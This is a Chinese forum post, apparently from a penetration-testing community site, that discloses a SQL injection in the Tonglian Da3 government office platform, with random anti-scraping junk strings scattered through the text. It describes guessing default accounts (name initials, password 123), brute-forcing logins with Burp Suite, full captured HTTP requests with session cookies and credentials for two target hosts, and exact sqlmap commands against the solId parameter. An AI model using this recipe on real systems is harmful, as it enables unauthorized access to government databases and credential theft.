中国网络渗透测试联盟

标题: 同联Da3协同办公平台前台通用sql injection漏洞 [打印本页]

作者: admin    时间: 2018-10-20 20:15
标题: 同联Da3协同办公平台前台通用sql injection漏洞

3 H% ^# @3 c; v
: {. P% X' s# j2 f6 M7 K

: f9 @1 {: k4 d5 j6 R9 l6 Y( [' e

! l0 K; N" f+ R6 X6 t 平台简介: / P$ m- b0 n% J* Q! y4 G8 v+ F

3 ]. y C* I( v( N0 g+ Y) `

# |$ i7 x& ^4 w3 O3 c: i0 h  + P3 l6 Q8 r# Q1 e

% U6 `( ?. i O4 D

9 `) _: v- F4 e( \* y9 h) [; P 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
8 z6 I, C; d3 N& U& Q5 q 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
5 N, h% p9 N z 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!0 }( H' E7 ~' B4 Y5 `! ^; ?

( v# b: O3 W1 P+ [

/ F" [! z# b+ Q& M" P5 P0 T# R   : s$ |8 l5 A1 A" P2 \: I

8 j7 _3 C. l5 F' l/ l) a

1 t9 n/ e& O$ _3 G$ \3 K 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:* j5 }' t7 |6 D7 W( z

8 G: Z& Z7 y' p! F5 `6 D+ e

6 H& x& ]1 R0 X: F& C   ; a+ N5 X* T% ]3 ^4 l0 S

6 J6 s8 f, N7 _; n' l* m

. P3 U9 r' [) |5 p, M9 T4 ]$ h2 c9 s http://1.1.1.1:7197/cap-aco/#(案例2-)$ x2 P! l+ U# L3 \1 o

: _8 `% ]& O9 ?) E! K

! P7 v9 q/ c. Z/ n: M4 D http://www.XXOO.com (案例1-官网网站)4 q* y, S, ]# Y& L) _

; I2 h& u. d/ o6 z2 p( k. ^

' V- }9 ^/ i) z; E. K8 `' m  7 e/ e; w4 o- D0 A9 J

6 ~0 b9 X& Y( ^% n8 _( Z

! G* }5 \. `$ ~1 M& L 漏洞详情: 7 L% Y$ U& `) ? ?5 [* h6 x0 d

/ T% Y. D+ u3 b3 Q2 A, Z1 Y0 @" e

: }7 g( i1 u" Z6 ]* z  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试: ?8 h @$ \# k. g

3 A( m: @3 }7 l- Y* l. n3 F

4 i. G: `; H- g$ d: V8 _; Z      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:1 h" g6 h% o. D8 R; `4 `

3 c. W/ O0 K( c

% H" l4 c+ b( [ q; }8 ^( _3 z. a4 P) G   8 @) ]; G9 \8 w2 e( k, J

9 h6 a, v( @0 z+ P" `

- r+ u" v- S8 R+ B8 }$ @' R0 x# Q  % r# x% n/ ^: w: s1 _0 L

& F, e4 _7 z2 t, E; u! z' c

5 D. K* A- |- ]' w% i+ X. k status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: * \, V, e! Y2 ?8 h0 Y& v

2 J6 \2 R: Q9 ? ]7 A

% ~) M ?, i8 f' O5 N 1、案例1-官方网站7 O! I, d+ r# p

9 ]2 c! E# f( w9 P

9 _+ D- ]9 u$ x' F$ s3 A: }9 g' K GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1- Z. c8 ?) e/ K9 V

/ d* R7 p3 [& ^! H$ e

$ \1 c) E! B- i Host: www.XXOO.com# K5 X! O5 c. O

+ }& c) ^& ^( e% W

# Q/ g% d0 A# H& V Proxy-Connection: Keep-Alive d7 f2 R# R/ X. ]- j9 ]+ M

; H3 e8 v4 L7 y

$ e6 v$ ~# T# x+ |, F( T5 V# ] O Accept: application/json, text/javascript, */*; q=0.012 ~3 [4 b* r s$ f- _$ |

. ]/ v; O! e2 x. H1 h7 E8 B

3 }: F: |6 S& b8 v! }( O+ p Accept-Language: zh-CN; l- m/ L% C* J7 c

2 f6 h: ^! h% H) z

1 ^! Q/ C# C ?& i/ c) ~% x Content-Type: application/json " ?' l4 A: e1 Y' P

H8 P3 m7 o1 [2 r) \: J

: g' s5 i. c( o7 t User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko 3 k! T7 S1 x' _

" y* |$ ]. L8 F$ v; u7 N/ `

" b# o+ M$ @7 N$ p X-Requested-With: XMLHttpRequest- t8 S' T( g; }3 i

) D9 d" c, k+ s" k$ P. `* t! e

/ Z( V5 _, A! ]2 D" z- u Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002, P \* g6 u9 w7 m. C

$ I: Z' R I9 }) @) f0 G

$ ` s% Z0 T& {3 i2 F Accept-Encoding: gzip, deflate, sdch 8 u; {* h0 K; @ g

! r) @7 B6 }# E# }9 d' O6 v* G0 n

3 ?, a4 y% W2 X Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e7 d+ f$ T" Y# A. D+ E

4 x$ m& C. o: W8 V

0 }: s9 X" f( d+ N ], Q6 \ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: # V0 d6 h" ]% _& J" p8 ]7 x

+ v1 B$ d3 c" O8 Z: T

0 ?& m/ e6 S F2 k   O' n5 W2 B! W' r3 L( ^- Z& z

* a% c4 T4 m, b: C) d# B! G# l0 c

& F2 N. G0 w4 }* f( O2 d" T L) Q! h   7 l$ Z. C0 _% J: V0 s6 l1 ?& m) G

( Q, [- _6 r C

4 W. D& k( L4 `7 P2 ^+ k   " A. ?! ]$ d8 Q2 O1 L

7 A$ l8 t5 M* _: `0 N, i7 B2 e

) ] a! V% f$ \+ c   / E1 S& L" d5 h: B+ u% I

1 a$ |$ P# w: r T D5 O" G' y

( a' s, p, @& F0 N( z4 ~8 k   9 d' \5 c0 w; [

" G) E; Z% W' A0 ]% f/ B B

$ o: Q& `- h5 Z) Z2 W. E 2、案例2-某天河云平台 ! n: L' M; U# k1 t i" _

# X- | |5 @# c8 i* F: X

1 Z1 O5 ]. ]( p8 @5 P0 d- u GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1& w$ I0 T+ a. K4 U

+ x3 ?, ]1 l* Z' [9 X2 @' H

3 k4 _8 u2 \0 X- b9 H; E6 S Host: 1.1.1.:7197 + i4 v$ x" x) z1 A5 Y+ s( a

4 r: J6 T! A2 W. G3 P/ z9 v* a2 D l. N

1 p$ q0 F# a+ C/ b. d* C$ C Accept: application/json, text/javascript, */*; q=0.018 J# i$ n% E5 E" { O$ f" ^3 v' {2 D3 X

3 S4 k2 P" H5 S0 C3 |$ F+ ?& K

5 m3 i4 O4 Z4 `' m6 N i X-Requested-With: XMLHttpRequest ; b. j$ U( o6 ~. w/ J

& ~ E i0 t0 d. S9 B2 y

& Q1 C0 V- ~3 Y$ ]4 j User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 % p! W7 P3 t2 P5 |

* B, C: v+ \% V# ]2 s/ c

, ?4 q0 G# j z7 u Content-Type: application/json 3 z3 k8 z! |1 P" R2 b4 N1 E

( v' I4 `+ y' l, N5 Q

# t. j# p- [$ }+ z Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008) A# M* l5 a7 c0 q( C5 `% }1 v2 |

8 j; J9 o* Q' ~) P; j

@) c- ]) R) q+ t! @3 H Accept-Language: zh-CN,zh;q=0.8 S) G+ ^& a* B2 q$ @

. g) d1 A. E4 f. b9 h; W

. n; {$ \$ g: H4 M5 h' e4 o Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1; C, e' Z( W' P9 d8 t$ m: y

\* b; |. y" Z: U

0 b6 D' I2 ]# {0 B& {- y: } Connection: close & i1 `7 {' A$ [) c

2 q. ~4 g7 Q, f* C* e& F

' V* _9 K2 f$ y* q 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: ' i9 c2 H8 M; F$ ?. J. M8 u

x* b+ Q0 L* W% p" f4 k' ~

! I X0 H0 l5 W2 t4 g) b! h4 z% j, s+ O5 A   ) Q7 _; V2 f5 g; {6 {

( v# Z; T$ ^# m* C4 u

1 s& o+ F# h' ~$ W( S* u u7 ?
1 `2 }' r* ]+ Z" v- V/ o+ K9 {






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2